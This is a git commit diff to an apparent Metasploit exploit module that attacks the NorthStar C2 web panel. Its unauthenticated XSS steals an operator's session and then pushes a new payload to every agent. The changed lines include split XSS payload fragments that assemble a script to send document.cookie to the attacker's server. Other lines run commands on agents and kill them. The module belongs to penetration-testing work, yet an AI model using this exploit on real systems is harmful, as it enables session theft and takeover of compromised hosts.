northstar_c2 adjustments

h00die · h00die · commit dd5a8c629f60 · 2024-04-24T16:54:02.000-04:00
diff --git a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -21,6 +21,7 @@ def initialize(info = {})
           An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.
           With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts
           (agents), and kill the original agent.
+
           Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on
           Ubuntu 22.04. The agent was running on Windows 10 19045.
         },
@@ -30,7 +31,7 @@ def initialize(info = {})
           'chebuya' # original PoC, analysis
         ],
         'DefaultOptions' => {
-          'WfsDelay' => 3_600, # 1hr
+          # 'WfsDelay' => 3_600, # 1hr
           'URIPATH' => '/' # avoid long URLs due to 20char limit in xss payloads
         },
         'References' => [
@@ -145,7 +146,7 @@ def steal_agents(cookie)
       agent_exec(agent_id, csrf_token, cookie, payload.encoded)
       vprint_status("  (#{agent_id}) Disabling shell mode")
       agent_exec(agent_id, csrf_token, cookie, 'disablecmd')
-      break unless datastore['KILL']
+      next unless datastore['KILL']
 
       vprint_status("  (#{agent_id}) Killing NorthStar payload")
       agent_exec(agent_id, csrf_token, cookie, 'die')
@@ -210,16 +211,15 @@ def srvhost
     datastore['SRVHOST']
   end
 
-  def exploit
-    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if srvhost == '0.0.0.0'
-    fail_with(Failure::BadConfig, 'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']
+  def primer
     @xss_response_received = false
     vprint_status('Sending XSS')
     # divide up the host length so that it fits in our payload
     h1 = srvhost[0...srvhost.length / 2]
     h2 = srvhost[srvhost.length / 2..]
-    sid_payloads = ['N*/</script><q', 'N*/i.src=u/*q', 'N*/new Image;/*q', 'N*/var i=/*q', "N*/s+h+p+'/'+c;/*q", 'N*/var u=/*q', "N*/'http://';/*q", 'N*/var s=/*q', "N*/':#{datastore['SRVPORT']}';/*q", 'N*/var p=/*q', 'N*/a+b;/*q', 'N*/var h=/*q', "N*/'#{h2}';/*q", 'N*/var b=/*q', "N*/'#{h1}';/*q", 'N*/var a=/*q', 'N*/d.cookie;/*q', 'N*/var c=/*q', 'N*/document;/*q', 'N*/var d=/*q', 'N</td><script>/*q']
+    sid_payloads = ['*/</script><', '*/i.src=u/*', '*/new Image;/*', '*/var i=/*', "*/s+h+p+'/'+c;/*", '*/var u=/*', "*/'http://';/*", '*/var s=/*', "*/':#{datastore['SRVPORT']}';/*", '*/var p=/*', '*/a+b;/*', '*/var h=/*', "*/'#{h2}';/*", '*/var b=/*', "*/'#{h1}';/*", '*/var a=/*', '*/d.cookie;/*', '*/var c=/*', '*/document;/*', '*/var d=/*', '</td><script>/*']
     sid_payloads.each do |pload|
+      pload = "N#{pload}q"
       vprint_status("Sending: #{pload}")
       res = send_request_cgi(
         'uri' => normalize_uri(target_uri.path, 'login.php'),
@@ -230,8 +230,14 @@ def exploit
       )
 
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code received: #{res.code}") unless res.code == 200
     end
     print_status('Waiting on XSS execution')
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+    fail_with(Failure::BadConfig, 'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']
     super
   end
 end
